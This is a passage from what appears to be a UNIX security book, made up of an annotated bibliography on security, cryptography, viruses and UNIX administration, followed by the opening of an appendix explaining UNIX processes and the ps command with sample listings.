Leveson, Nancy G. Safeware: System Safety and Computers. A Guide to Preventing Accidents and<br />

Losses Caused by Technology. Reading, MA: Addison Wesley, 1995. This textbook contains a<br />

comprehensive exploration of the dangers of computer systems, and explores ways in which software can<br />

be made more fault tolerant and safety conscious.<br />

Neumann, Peter G. Computer Related Risks. Reading, MA: Addison-Wesley, 1995. Dr. Neumann moderates the Internet RISKS mailing list. This book is a collection of the most important stories passed over the mailing list since its creation.

Weiner, Lauren Ruth. Digital Woes: Why we Should not Depend on Software. Reading, MA:<br />

Addison-Wesley, 1993. A popular account of problems with software.<br />

D.1.4 Computer Viruses and Programmed Threats<br />

Communications of the ACM, Volume 32, Number 6, June 1989 (the entire issue). This whole issue was<br />

devoted to issues surrounding the <strong>Internet</strong> Worm incident.<br />

Computer Virus Attacks. Gaithersburg, MD: National Computer Systems Bulletin, National Computer<br />

Systems Laboratory, National Institute for Standards and Technology. (Order from National Technical<br />

Information Service, 703-487-4650, Order number PB90-115601.) One of many fine summary<br />

publications published by NIST; contact NTIS at 5285 Port Royal Road, Springfield, VA 22161, for a<br />

complete publication list.<br />

Denning, Peter J. Computers Under Attack: Intruders, Worms and Viruses. Reading, MA:<br />

ACM Press/Addison-Wesley, 1990. One of the two most comprehensive collections of readings related<br />

to these topics, including reprints of many classic articles. A "must-have."<br />

Ferbrache, David. The Pathology of Computer Viruses. London, England: Springer-Verlag, 1992. This is<br />

probably the best all-around book on the technical aspects of computer viruses.<br />

Hoffman, Lance J., Rogue Programs: Viruses, Worms and Trojan Horses. New York, NY: Van Nostrand Reinhold, 1990. The other most comprehensive collection of readings on viruses, worms, and the like. A must for anyone interested in the issues involved.

The Virus Bulletin. Virus Bulletin CTD. Oxon, England. A monthly international publication on computer virus prevention and removal. (U.S. orders may be placed c/o June Jordan, (203) 431-8720, for $395/year. European orders may be placed through +44 235-555139 for £195/year.) This is an outstanding publication about computer viruses and virus prevention. It is likely to be of value only to sites with a significant PC population, however. The publication also sponsors a yearly conference that has good papers on viruses. http://www.virusbtn.com.

D.1.5 Cryptography Books<br />

Bamford, James. The Puzzle Palace: A Report on America's Most <strong>Sec</strong>ret Agency. Boston, MA: Houghton<br />

Mifflin, 1982. The complete, inside story of the National <strong>Sec</strong>urity Agency.<br />

Denning, Dorothy E. R. Cryptography and Data <strong>Sec</strong>urity. Reading, MA: Addison-Wesley, 1983. The<br />

classic textbook in the field.<br />

Garfinkel, Simson. PGP: Pretty Good Privacy. Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1994. Describes<br />

the history of cryptography, the history of the program PGP, and explains the PGP's use.<br />

Hinsley, F.H., and Alan Stripp. Code Breakers: The Inside Story of Bletchley Park. Oxford, England:<br />

Oxford University Press, 1993.<br />

Hodges, Andrew. Alan Turing: The Enigma. New York, NY: Simon & Schuster, Inc., 1983. The<br />

definitive biography of the brilliant scientist who broke "Enigma," Germany's deepest World War II<br />

secret; who pioneered the modern computer age; and who finally fell victim to the Cold War world of<br />

military secrets and sex scandals.<br />

Hoffman, Lance J. Building in Big Brother: The Cryptographic Policy Debate. New York, NY:<br />

Springer-Verlag, 1995. An interesting collection of papers and articles about the Clipper Chip, Digital<br />

Telephony legislation, and public policy on encryption.<br />

Kahn, David. The Codebreakers. New York, NY: Macmillan Company, 1972. The definitive history of<br />

cryptography prior to the invention of public key.<br />

Kahn, David. Seizing the Enigma: The Race to Break the German U-Boat Codes, 1939-1943. Boston,<br />

MA: Houghton Mifflin, 1991.<br />

Merkle, Ralph. <strong>Sec</strong>recy, Authentication and Public Key Systems. Ann Arbor, MI: UMI Research Press,<br />

1982.<br />

Schneier, Bruce. Applied Cryptography: Protocols, Algorithms, and Source Code in C. <strong>Sec</strong>ond edition.<br />

New York, NY: John Wiley & Sons, 1996. The most comprehensive, unclassified book about computer<br />

encryption and data-privacy techniques ever published.<br />

Simmons, G.J., ed. Contemporary Cryptology: The Science of Information Integrity. New York, NY:<br />

IEEE Press, 1992.<br />

Smith, Laurence Dwight. Cryptography: The Science of <strong>Sec</strong>ret Writing. New York, NY: Dover<br />

Publications, 1941.<br />


D.1.6 Cryptography Papers and Other Publications<br />

Association for Computing Machinery. "Codes, Keys, and Conflicts: Issues in U.S. Crypto Policy."<br />

Report of a Special Panel of the ACM U.S. Public Policy Committee location: USACM, June 1994.<br />

(URL: http://info.acm.org/reports/acm_crypto_study.html)<br />

Coppersmith, Don. IBM Journal of Research and Development 38 (1994).<br />

Diffie, Whitfield. "The First Ten Years of Public-Key Cryptography." Proceedings of the IEEE 76<br />

(1988): 560-76. Whitfield Diffie's tour-de-force history of public key cryptography, with revealing<br />

commentaries.<br />

Diffie, Whitfield, and M.E. Hellman. "New Directions in Cryptography." IEEE Transactions on<br />

Information Theory IT-22 (1976). The article that introduced the concept of public key cryptography.<br />

Hoffman, Lance J., Faraz A. Ali, Steven L. Heckler, and Ann Huybrechts. "Cryptography Policy." Communications of the ACM 37 (1994): 109-17.

Lai, Xuejia. "On the Design and <strong>Sec</strong>urity of Block Ciphers." ETH Series in Information Processing 1<br />

(1992). The article describing the IDEA cipher.<br />

Lai, Xuejia, and James L. Massey. "A Proposal for a New Block Encryption Standard." Advances in<br />

Cryptology-EUROCRYPT '90 Proceedings (1992): 55-70. Another article describing the IDEA cipher.<br />

LaMacchia, Brian A., and Andrew M. Odlyzko. "Computation of Discrete Logarithms in Prime Fields." Designs, Codes, and Cryptography (1991): 46-62.

Lenstra, A.K., H. W. Lenstra, Jr., M.S. Manasse, and J.M. Pollard. "The Number Field Sieve."<br />

Proceedings of the 22nd ACM Symposium on the Theory of Computing. Baltimore MD: ACM Press,<br />

1990, 564-72.<br />

Lenstra, A.K., Lenstra, Jr., H.W., Manasse, M.S., and J.M. Pollard. "The Factorization of the Ninth<br />

Fermat Number." Mathematics of Computation 61 (1993): 319-50.<br />

Merkle, Ralph. "<strong>Sec</strong>ure Communication Over Insecure Channels." Communications of the ACM 21<br />

(1978): 294-99 (submitted in 1975). The article that should have introduced the concept of public key<br />

cryptography.<br />

Merkle, Ralph, and Martin E. Hellman. "On the <strong>Sec</strong>urity of Multiple Encryption." Communications of<br />

the ACM 24 (1981): 465-67.<br />

Merkle, Ralph, and Martin E. Hellman. "Hiding Information and Signatures in Trap Door Knapsacks."<br />

IEEE Transactions on Information Theory 24 (1978): 525-30.<br />

National Bureau of Standards. Data Encryption Standard, 1987. (FIPS PUB 46-1)

Rivest, Ron. Ciphertext: The RSA Newsletter 1 (1993).<br />

Rivest, Ron, A. Shamir, and L. Adleman. "A Method for Obtaining Digital Signatures and Public Key<br />

Cryptosystems." Communications of the ACM 21 (1978).<br />


Simmons, G. J. "How to Insure that Data Acquired to Verify Treaty Compliance are Trustworthy." in<br />

"Authentication without secrecy: A secure communications problem uniquely solvable by asymmetric<br />

encryption techniques." IEEE EASCON '79, (1979): 661-62.<br />

D.1.7 General Computer <strong>Sec</strong>urity<br />

Amoroso, Edward. Fundamentals of Computer <strong>Sec</strong>urity Technology. Englewood Cliffs, NJ:<br />

Prentice-Hall, 1994. A very readable and complete introduction to computer security at the level of a<br />

college text.<br />

Carroll, John M. Computer <strong>Sec</strong>urity. 2nd edition, Stoneham, MA: Butterworth Publishers, 1987.<br />

Contains an excellent treatment of issues in physical communications security.<br />

Computers & <strong>Sec</strong>urity. This is a journal published eight times each year by Elsevier Press, Oxford,<br />

England. (Order from Elsevier Press, +44-(0) 865-512242.) It is one of the main journals in the field.<br />

This journal is priced for institutional subscriptions, not individuals. Each issue contains pointers to<br />

dozens of other publications and organizations that might be of interest, as well as referenced articles,<br />

practicums, and correspondence. The URL for the WWW page is included in "<strong>Sec</strong>urity Periodicals."<br />

Computer <strong>Sec</strong>urity Requirements - Guidance for Applying the Department of Defense Trusted Computer<br />

System Evaluation Criteria in Specific Environments, Fort George G. Meade, MD: National Computer<br />

<strong>Sec</strong>urity Center, 1985. (Order number CSC-STD-003-85.) (The Yellow Book)<br />

Datapro Reports on Computer <strong>Sec</strong>urity. Delran, NJ: McGraw-Hill. (Order from Datapro, 609-764-0100.)<br />

An ongoing (and expensive) series of reports on various issues of security, including legislation trends,<br />

new products, items in the news, and more. Practitioners are divided on the value of this publication, so<br />

check it out carefully before you buy it to see if it is useful in your situation.<br />

Department of Defense Password Management Guideline. Fort George G. Meade, MD: National<br />

Computer <strong>Sec</strong>urity Center, 1985. (Order number CSC-STD-002-85.) (The Green Book)<br />

Department of Defense Trusted Computer System Evaluation Criteria. Fort George G. Meade, MD:<br />

National Computer <strong>Sec</strong>urity Center, 1985. (Order number DoD 5200.28-STD.) (The Orange Book)<br />

Fites, P. E., M. P. J. Kratz, and A. F. Brebner. Control and <strong>Sec</strong>urity of Computer Information Systems.<br />

Rockville, MD: Computer Science Press, 1989. A good introduction to the administration of security<br />

policy and not techniques.<br />

Gasser, Morrie. Building a <strong>Sec</strong>ure Computer System. New York, NY: Van Nostrand Reinhold, 1988. A<br />

solid introduction to issues of secure system design.<br />

Hunt, A. E., S. Bosworth, and D. B. Hoyt, eds. Computer <strong>Sec</strong>urity Handbook, 3rd edition. New York,<br />

NY: Wiley, 1995. A massive and thorough collection of essays on all aspects of computer security.<br />

National Research Council, Computers at Risk: Safe Computing in the Information Age. Washington,<br />

DC: National Academy Press, 1991. (Order from NRC, 1-800-624-6242.) This book created considerable<br />

comment. It's a report of a panel of experts discussing the need for national concern and research in the<br />

areas of computer security and privacy. Some people think it is a significant publication, while others<br />

believe it has faulty assumptions and conclusions. Either way, you should probably read it.<br />


Pfleeger, Charles P. <strong>Sec</strong>urity in Computing. Englewood Cliffs, NJ: Prentice-Hall, 1989. Another good<br />

introduction to computer security.<br />

Russell, Deborah, and G. T. Gangemi, Sr. Computer <strong>Sec</strong>urity Basics. Sebastopol, CA: <strong>O'Reilly</strong> &<br />

Associates, 1991. An excellent introduction to many areas of computer security and a summary of<br />

government security requirements and issues.<br />

Thompson, Ken. "Reflections on Trusting Trust" Communications of the ACM, Volume 27, Number 8,<br />

August (1984). This is a "must-read" for anyone seeking to understand the limits of computer security<br />

and trust.<br />

Wood, Charles Cresson, et al. Computer <strong>Sec</strong>urity: A Comprehensive Controls Checklist, New York, NY:<br />

John Wiley & Sons, 1987. Contains many comprehensive and detailed checklists for assessing the state<br />

of your own computer security and operations.<br />

Wood, Charles Cresson. Information <strong>Sec</strong>urity Policies Made Easy. Sausalito, CA: Baseline Software,<br />

1994. This book and accompanying software allow the reader to construct a corporate security policy<br />

using hundreds of components listed in the book. Pricey, but worth it if you need to write a<br />

comprehensive policy:<br />

Baseline Software<br />

PO Box 1219<br />

Sausalito, CA 94966-1219<br />

++1 415-332-7763<br />

D.1.8 Network Technology and <strong>Sec</strong>urity<br />

Bellovin, Steve and Cheswick, Bill. Firewalls and <strong>Internet</strong> <strong>Sec</strong>urity. Reading, MA: Addison-Wesley,<br />

1994. The classic book on firewalls. This book will teach you everything you need to know about how<br />

firewalls work, but it will leave you without implementation details unless you happen to have access to<br />

the full source code to the <strong>UNIX</strong> operating system and a staff of programmers who can write bug-free<br />

code.<br />

Chapman, D. Brent, and Elizabeth D. Zwicky. Building <strong>Internet</strong> Firewalls. Sebastopol, CA: <strong>O'Reilly</strong> &<br />

Associates, 1995. A good how-to book that describes in clear detail how to build your own firewall.<br />

Comer, Douglas E. <strong>Internet</strong>working with TCP/IP. 3rd Edition. Englewood Cliffs, NJ: Prentice Hall,<br />

1995. A complete, readable reference that describes how TCP/IP networking works, including<br />

information on protocols, tuning, and applications.<br />

Frey, Donnalyn, and Rick Adams. !%@:: A Directory of Electronic Mail Addressing and Networks,<br />

Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1990. This guide is a complete reference to everything you<br />

would ever want to know about sending electronic mail. It covers addressing and transport issues for<br />

almost every known network, along with lots of other useful information to help you get mail from here<br />

to there. Highly recommended.<br />

Hunt, Craig. TCP/IP Network Administration. Sebastopol, CA: O'Reilly & Associates, 1992. This book is an excellent system administrator's overview of TCP/IP networking (with a focus on UNIX systems), and a very useful reference to major UNIX networking services and tools such as BIND (the standard UNIX DNS server) and sendmail (the standard UNIX SMTP server).

Kaufman, Charles, Radia Perlman, and Mike Speciner. Network <strong>Sec</strong>urity: Private Communications in a<br />

Public World. Englewood Cliffs, NJ: Prentice-Hall, 1995.<br />

Liu, Cricket, Jerry Peek, Russ Jones, Bryan Buus, and Adrian Nye. Managing <strong>Internet</strong> Information<br />

Services, Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1994. This is an excellent guide to setting up and<br />

managing <strong>Internet</strong> services such as the World Wide Web, FTP, Gopher, and more, including discussions<br />

of the security implications of these services.<br />

Stallings, William. Network and <strong>Internet</strong>work <strong>Sec</strong>urity: Principles and Practice. Englewood Cliffs, NJ:<br />

Prentice Hall, 1995. A good introductory textbook.<br />

Stevens, Richard W. TCP/IP Illustrated. The Protocols, Volume 1. Reading, MA: Addison-Wesley,<br />

1994. This is a good guide to the nuts and bolts of TCP/IP networking. Its main strength is that it<br />

provides traces of the packets going back and forth as the protocols are actually in use, and uses the<br />

traces to illustrate the discussions of the protocols.<br />

Quarterman, John. The Matrix: Computer Networks and Conferencing Systems Worldwide. Bedford,<br />

MA: Digital Press, 1990. A dated but still insightful book describing the networks, protocols, and politics<br />

of the world of networking.<br />

D.1.9 <strong>Sec</strong>urity Products and Services Information<br />

Computer <strong>Sec</strong>urity Buyer's Guide. Computer <strong>Sec</strong>urity Institute, San Francisco, CA. (Order from CSI,<br />

415-905-2626.) Contains a comprehensive list of computer security hardware devices and software<br />

systems that are commercially available. The guide is free with membership in the Institute. The URL is<br />

at http://www.gocsi.com.<br />

D.1.10 Understanding the Computer <strong>Sec</strong>urity "Culture"<br />

All of these describe views of the future and computer networks that are much discussed (and emulated)<br />

by system crackers.<br />

Brunner, John. Shockwave Rider. New York, NY: A Del Ray Book, published by Ballantine, 1975. One<br />

of the first descriptions of a computer worm.<br />

Gibson, William. Burning Chrome, Count Zero, Mona Lisa Overdrive, and Neuromancer. New York, NY: Bantam Books. Four cyberpunk books by the science fiction author who coined the term "cyberspace."

Hafner, Katie, and John Markoff. Cyberpunk: Outlaws and Hackers on the Computer Frontier. New York, NY: Simon and Schuster, 1991. Tells the stories of three hackers - Kevin Mitnick, Pengo, and Robert T. Morris.

Levy, Steven. Hackers: Heroes of the Computer Revolution. New York, NY: Dell Books, 1984. One of<br />

the original publications describing the "hacker ethic."<br />

Littman, Jonathan, The Fugitive Game: Online with Kevin Mitnick. Boston, MA: Little, Brown, 1996. A year prior to his capture in 1995, Jonathan Littman had extensive telephone conversations with Kevin Mitnick and learned what it is like to be a computer hacker on the run. This is the story.

Shimomura, Tsutomu, with John Markoff. Takedown: The Pursuit and Capture of Kevin Mitnick,<br />

America's Most Wanted Computer Outlaw---By the Man Who Did it. New York, NY: Hyperion, 1995.<br />

On Christmas Day, 1994, an attacker broke into Tsutomu Shimomura's computer. A few weeks later,<br />

Shimomura was asked to help out with a series of break-ins at two major Internet service providers in the San Francisco area. Eventually, the trail led to North Carolina, where Shimomura participated in the

tracking and capture of Kevin Mitnick. This is the story, written by Shimomura and Markoff. Markoff is<br />

the journalist with The New York Times who covered the capture.<br />

Sterling, Bruce. The Hacker Crackdown: Law and Disorder on the Electronic Frontier. This book is<br />

available in several places on the WWW; http://www-swiss.ai.mit.edu/~bal/sterling/contents.html is one<br />

location; other locations can be found in the COAST hotlist.<br />

Stoll, Cliff. The Cuckoo's Egg, Garden City, NY: Doubleday, 1989. An amusing and gripping account of<br />

tracing a computer intruder through the networks. The intruder was later found to be working for the<br />

KGB and trying to steal sensitive information from U.S. systems.<br />

Varley, John. Press Enter. Reprinted in several collections of science fiction, including Blue Champagne,<br />

Ace Books, 1986; Isaac Asimov's Science Fiction Magazine, 1984; and Tor SF Doubles, October, Tor<br />

Books, 1990.<br />

Vinge, Vernor. True Names and Other Dangers. New York, NY: Baen, distributed by Simon & Schuster,<br />

1987.<br />

D.1.11 <strong>UNIX</strong> Programming and System Administration<br />

Albitz, Paul and Cricket Liu. DNS and BIND. Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1992. An<br />

excellent reference for setting up DNS nameservers.<br />

Bach, Maurice. The Design of the <strong>UNIX</strong> Operating System. Englewood Cliffs, NJ: Prentice-Hall, 1986.<br />

Good background about how the internals of <strong>UNIX</strong> work. Basically oriented toward older System V<br />

<strong>UNIX</strong>, but with details applicable to every version.<br />

Bolsky, Morris I., and David G. Korn. The New Kornshell Command and Programming Language.<br />

Englewood Cliffs, NJ: Prentice-Hall, 1995. This is a complete tutorial and reference to the 1992 ksh - the<br />

only shell some of us use when given the choice.<br />

Costales, Bryan, with Eric Allman and Neil Rickert. sendmail. Sebastopol, CA: <strong>O'Reilly</strong> & Associates,<br />

1993. Rightly or wrongly, many <strong>UNIX</strong> sites continue to use the sendmail mail program. This huge book<br />

will give you tips on configuring it more securely.<br />

Goodheart, B. and J. Cox. The Magic Garden Explained: The Internals of <strong>UNIX</strong> SVR4. Englewood<br />

Cliffs, N.J.: Prentice-Hall, 1994<br />

Harbison, Samuel P. and Guy L. Steele Jr., C, a Reference Manual. Englewood Cliffs, NJ: Prentice Hall,<br />

1984.<br />

Hu, Wei. DCE <strong>Sec</strong>urity Programming. Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1995.<br />


Kernighan, Brian, Dennis Ritchie and Rob Pike. The <strong>UNIX</strong> Programming Environment. Englewood<br />

Cliffs, NJ: Prentice-Hall, 1984. A nice guide to the <strong>UNIX</strong> philosophy and how to build shell scripts and<br />

command environments under <strong>UNIX</strong>.<br />

Leffler, Samuel, Marshall Kirk McKusick, Michael Karels, and John Quarterman. The Design and<br />

Implementation of the 4.3 BSD <strong>UNIX</strong> Operating System. Reading, MA: Addison Wesley, 1989. This<br />

book can be viewed as the BSD version of Maurice Bach's book. It is a readable and detailed description<br />

of how and why the BSD <strong>UNIX</strong> system is designed the way it is. (An updated version covering BSD 4.4<br />

is rumored to be in production, to appear after publication of this edition.)<br />

Nemeth, Evi, Garth Snyder, Scott Seebass, and Trent R. Hein. <strong>UNIX</strong> System Administration Handbook.<br />

2nd Edition. Englewood Cliffs, NJ: Prentice-Hall, 1995. An excellent reference on the various ins and<br />

outs of running a <strong>UNIX</strong> system. This book includes information on system configuration, adding and<br />

deleting users, running accounting, performing backups, configuring networks, running sendmail, and<br />

much more. Highly recommended.<br />

<strong>O'Reilly</strong>, Tim, and Grace Todino. Managing UUCP and Usenet. Sebastopol CA: <strong>O'Reilly</strong> & Associates,<br />

1992. If you run UUCP on your machine, you need this book. It discusses all the various intricacies of<br />

running the various versions of UUCP. Included is material on setup and configuration, debugging<br />

connections, and accounting. Highly recommended.<br />

Peek, Jerry et al. <strong>UNIX</strong> Power Tools, Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1993.<br />

Ramsey, Rick. All About Administering NIS+. Englewood Cliffs, NJ: Prentice-Hall, 1994.<br />

Rochkind, Marc. Advanced UNIX Programming. Englewood Cliffs, NJ: Prentice-Hall, 1985. This book has an easy-to-follow introduction to various system calls in UNIX (primarily System V) and explains how to use them from C programs. If you are administering a system and reading or writing system-level code, this book is a good way to get started, but keep in mind that it is rather dated.

Stevens, W. Richard. Advanced Programming in the <strong>UNIX</strong> Environment. Reading, MA:<br />

Addison-Wesley, 1992.<br />

D.1.12 Miscellaneous References<br />

Hawking, Stephen W. A Brief History of Time: From the Big Bang to Black Holes, New York, NY:<br />

Bantam Books, 1988. Want to find the age of the universe? It's in here, but <strong>UNIX</strong> is not.<br />

Miller, Barton P., Lars Fredriksen, and Bryan So. "An Empirical Study of the Reliability of <strong>UNIX</strong><br />

Utilities," Communications of the ACM, Volume 33, Number 12, December 1990, 32-44. A<br />

thought-provoking report of a study showing how <strong>UNIX</strong> utilities behave when given unexpected input.<br />

Wall, Larry, and Randal L. Schwartz. Programming perl, Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1991.<br />

The definitive reference to the Perl scripting language. A must for anyone who does much shell, awk, or<br />

sed programming or would like to quickly write some applications in <strong>UNIX</strong>.<br />

Wall, Larry and Randal L. Schwartz. Learning perl, Sebastopol, CA: <strong>O'Reilly</strong> & Associates, 1993.<br />


Appendix C<br />

C. <strong>UNIX</strong> Processes<br />

Contents:<br />

About Processes<br />

Creating Processes<br />

Signals<br />

The kill Command<br />

Starting Up <strong>UNIX</strong> and Logging In<br />

This appendix provides technical background on how the UNIX operating system manages processes. The information presented in this appendix is important to understand if you are concerned with the details of system administration or are simply interested in UNIX internals, but we felt that it was too technical to present early in this book.

C.1 About Processes<br />

<strong>UNIX</strong> is a multitasking operating system. Every task that the computer is performing at any moment - every user running a word<br />

processor program, for example - has a process. The process is the operating system's fundamental tool for controlling the computer.<br />

Nearly everything that <strong>UNIX</strong> does is done with a process. One process displays the word login: on the user's terminal and reads the<br />

characters that the user types to log into the system. Another process controls the line printer. On a workstation, a special process<br />

called the "window server" displays text in windows on the screen. Another process called the "window manager" lets the user move<br />

those windows around.<br />

At any given moment, the average <strong>UNIX</strong> operating system might be running anywhere from ten to several hundred different<br />

processes; large mainframes might be running several thousand. <strong>UNIX</strong> runs at least one process for every user who is logged in,<br />

another process for every program that every user is running, and another process for every hard-wired terminal that is waiting for a<br />

new user to log in. <strong>UNIX</strong> also uses a variety of special processes for system functions.<br />

C.1.1 Processes and Programs<br />

A process is an abstraction of control that has certain special properties associated with it. These include a private stack, values of registers, a program counter, an address space containing program code and data, and so on. The underlying hardware and operating system software manage the contents of registers in such a way that each process views the computer's resources as its "own" while it is running. With a single processor, only one process at a time is actually running, with the operating system swapping processes from time to time to give the illusion that they are all running concurrently. Multi-processor computers can run several processes truly simultaneously.

Every <strong>UNIX</strong> process has a program that it is running, even if that program is part of the <strong>UNIX</strong> operating system (a special program).<br />

Programs are usually referred to by the names of the files in which they are kept. For example, the program that lists files is called<br />

/bin/ls and the program that runs the line printer may be called /usr/lib/lpd.<br />

A process can run a program that is not stored in a file in either of two ways:

● The program's file can be deleted after its process starts up. In this case, the process's program is really stored in a file, but the file no longer has a name and cannot be accessed by any other processes. The file is deleted automatically when the process exits or runs another program.

● The process may have been specially created in the computer's memory. This is the method that the UNIX kernel uses to begin the first process when the operating system starts up. This usually happens only at start-up, but some programming languages such as LISP can load additional object modules as they are running.

Normally, processes run a single program and then exit. However, a program can cause another program to be run. In this case, the same process starts running another program.
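The first case is easy to try for yourself. The following is a minimal sketch, assuming a Berkeley-style ps and that sleep lives in /bin on your system; the file name /tmp/mysleep is an arbitrary choice, and the exact ps options and output vary from version to version:

% cp /bin/sleep /tmp/mysleep
% /tmp/mysleep 600 &
% rm /tmp/mysleep
% ps -auxww | grep mysleep

The copy of sleep keeps running even though /tmp/mysleep no longer has a directory entry; the space it occupies on disk is reclaimed only when the process exits.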

C.1.2 The ps Command<br />

The ps command gives you a snapshot of all of the processes running at any given moment. ps tells you who is running programs on your system, as well as which programs the operating system is spending its time executing.

Most system administrators routinely use the ps command to see why their computers are running so slowly; system administrators should also regularly use the command to look for suspicious processes. (Suspicious processes are any processes that you don't expect to be running. Methods of identifying suspicious processes are described in detail in earlier chapters.)
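One simple way to make such reviews routine is to compare the current process listing against a snapshot taken while the system was known to be in a good state. This is only a sketch; the snapshot location /var/adm/ps.baseline is an arbitrary choice, and you should use whichever ps invocation your system supports (both forms are described in the sections that follow). First, while the system is known to be clean:

% ps -ef > /var/adm/ps.baseline

Later, when you want to review the system:

% ps -ef > /tmp/ps.now
% diff /var/adm/ps.baseline /tmp/ps.now

Because PIDs and start times change constantly, most of the differences will be harmless; what you are looking for is command names that you do not recognize or do not expect.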

C.1.2.1 Listing processes with systems derived from System V<br />

The System V ps command will normally only print the processes that are associated with the terminal on which the program is being<br />

run. To list all of the processes that are running on your computer, you must run the program with the -ef options. The options are:<br />

Option Effect<br />

e List all processes<br />

f Produce a full listing<br />

For example:<br />

sun.vineyard.net% /bin/ps -ef
UID PID PPID C STIME TTY TIME COMD
root 0 0 64 Nov 16 ? 0:01 sched
root 1 0 80 Nov 16 ? 9:56 /etc/init -
root 2 0 80 Nov 16 ? 0:10 pageout
root 3 0 80 Nov 16 ? 78:20 fsflush
root 227 1 24 Nov 16 ? 0:00 /usr/lib/saf/sac -t 300
root 269 1 18 Nov 16 console 0:00 /usr/lib/saf/ttymon -g -
root 97 1 80 Nov 16 ? 1:02 /usr/sbin/rpcbind
root 208 1 80 Nov 16 ? 0:01 /usr/dt/bin/dtlogin
root 99 1 21 Nov 16 ? 0:00 /usr/sbin/keyserv
root 117 1 12 Nov 16 ? 0:00 /usr/lib/nfs/statd
root 105 1 12 Nov 16 ? 0:00 /usr/sbin/kerbd
root 119 1 27 Nov 16 ? 0:00 /usr/lib/nfs/lockd
root 138 1 12 Nov 16 ? 0:00 /usr/lib/autofs/automoun
root 162 1 62 Nov 16 ? 0:01 /usr/lib/lpsched
root 142 1 41 Nov 16 ? 0:00 /usr/sbin/syslogd
root 152 1 80 Nov 16 ? 0:07 /usr/sbin/cron
root 169 162 8 Nov 16 ? 0:00 lpNet
root 172 1 80 Nov 16 ? 0:02 /usr/lib/sendmail -q1h
root 199 1 80 Nov 16 ? 0:02 /usr/sbin/vold
root 180 1 80 Nov 16 ? 0:04 /usr/lib/utmpd
root 234 227 31 Nov 16 ? 0:00 /usr/lib/saf/listen tcp
simsong 14670 14563 13 12:22:12 pts/11 0:00 rlogin next
root 235 227 45 Nov 16 ? 0:00 /usr/lib/saf/ttymon
simsong 14673 14535 34 12:23:06 pts/5 0:00 rlogin next
simsong 14509 1 80 11:32:43 ? 0:05 /usr/dt/bin/dsdm
simsong 14528 14520 80 11:32:51 ? 0:18 dtwm
simsong 14535 14533 66 11:33:04 pts/5 0:01 /usr/local/bin/tcsh
simsong 14529 14520 80 11:32:56 ? 0:03 dtfile -session dta003TF
root 14467 1 11 11:32:23 ? 0:00 /usr/openwin/bin/fbconso
simsong 14635 14533 80 11:48:18 pts/12 0:01 /usr/local/bin/tcsh
simsong 14728 14727 65 15:29:20 pts/9 0:01 rlogin next
root 332 114 80 Nov 16 ? 0:02 /usr/dt/bin/rpc.ttdbserv
root 14086 208 80 Dec 01 ? 8:26 /usr/openwin/bin/Xsun :0
simsong 13121 13098 80 Nov 29 pts/6 0:01 /usr/local/bin/tcsh
simsong 15074 14635 20 10:48:34 pts/12 0:00 /bin/ps -ef

Table C.1 describes the meaning of each field in this output.

Table C.1: Fields in ps Output (System V)

Field Meaning<br />

UID The username of the person running the command<br />

PID The process's identification number (see next section)<br />

PPID The process ID of the process's parent process<br />

C The processor utilization; an indication of how much CPU time the process is using at the moment<br />

STIME The time that the process started executing<br />

TTY The controlling terminal for the process<br />

TIME The total amount of CPU time that the process has used<br />

COMD The command that was used to start the process<br />

C.1.2.2 Listing processes with Berkeley-derived versions of <strong>UNIX</strong><br />

With Berkeley <strong>UNIX</strong>, you can use the command:<br />

% ps -auxww<br />

to display detailed information about every process running on your computer. The options specified in this command are:<br />

Option Effect<br />

a List all processes<br />

u Display the information in a user-oriented style<br />

x Include information on processes that do not have controlling ttys<br />

ww Include the complete command lines, even if they run past 132 columns<br />

For example:[1]<br />

[1] Many Berkeley-derived versions also show a start time (START) between STAT and TIME.<br />

% ps -auxww<br />

USER PID %CPU %MEM SZ RSS TT STAT TIME COMMAND<br />

simsong 1996 62.6 0.6 1136 1000 q8 R 0:02 ps auxww<br />

root 111 0.0 0.0 32 16 ? I 1:10 /etc/biod 4<br />

daemon 115 0.0 0.1 164 148 ? S 2:06 /etc/syslog<br />

root 103 0.0 0.1 140 116 ? I 0:44 /etc/portmap<br />

root 116 0.0 0.5 860 832 ? I 12:24 /etc/mountd -i -s<br />

root 191 0.0 0.2 384 352 ? I 0:30 /usr/etc/bin/lpd<br />

root 73 0.0 0.3 528 484 ? S < 7:31 /usr/etc/ntpd -n<br />

root 4 0.0 0.0 0 0 ? I 0:00 tpathd<br />

root 3 0.0 0.0 0 0 ? R 0:00 idleproc<br />

root 2 0.0 0.0 4096 0 ? D 0:00 pagedaemon<br />

root 239 0.0 0.1 180 156 co I 0:00 std.9600 console<br />

root 0 0.0 0.0 0 0 ? D 0:08 swapper<br />

root 178 0.0 0.3 700 616 ? I 6:31 /etc/snmpd<br />

root 174 0.0 0.1 184 148 ? S 5:06 /etc/inetd<br />

root 168 0.0 0.0 56 44 ? I 0:16 /etc/cron<br />

root 132 0.0 0.2 452 352 co I 0:11 /usr/etc/lockd<br />

jdavis 383 0.0 0.1 176 96 p0 I 0:03 rlogin hymie<br />

ishii 1985 0.0 0.1 284 152 q1 S 0:00 /usr/ucb/mail bl<br />

root 26795 0.0 0.1 128 92 ? S 0:00 timed<br />

root 25728 0.0 0.0 136 56 t3 I 0:00 telnetd<br />

jdavis 359 0.0 0.1 540 212 p0 I 0:00 -tcsh (tcsh)<br />


root 205 0.0 0.1 216 168 ? I 0:04 /usr/local/cap/atis<br />

kkarahal 16296 0.0 0.4 1144 640 ? I 0:00 emacs<br />

root 358 0.0 0.0 120 44 p0 I 0:03 rlogind<br />

root 26568 0.0 0.0 0 0 ? Z 0:00 <defunct><br />

root 10862 0.0 0.1 376 112 ? I 0:00 rshd<br />

The fields in this output are described in Table C.2. Individual STAT characters are described in Tables C.3, C.4, and C.5.<br />

Table C.2: Fields in ps Output (Berkeley-derived)<br />

Field Meaning<br />

USER The username of the process. If the process has a UID (described in the next section) that does not appear in<br />

/etc/passwd, the UID is printed instead.[2]<br />

PID The process's identification number<br />

%CPU, %MEM The percentage of the system's CPU and memory that the process is using<br />

SZ The amount of virtual memory that the process is using<br />

RSS The resident set size of the process - the amount of physical memory that the process is occupying<br />

TT The terminal that is controlling the process<br />

STAT A field denoting the status of the process; up to three letters (four under SunOS) are shown<br />

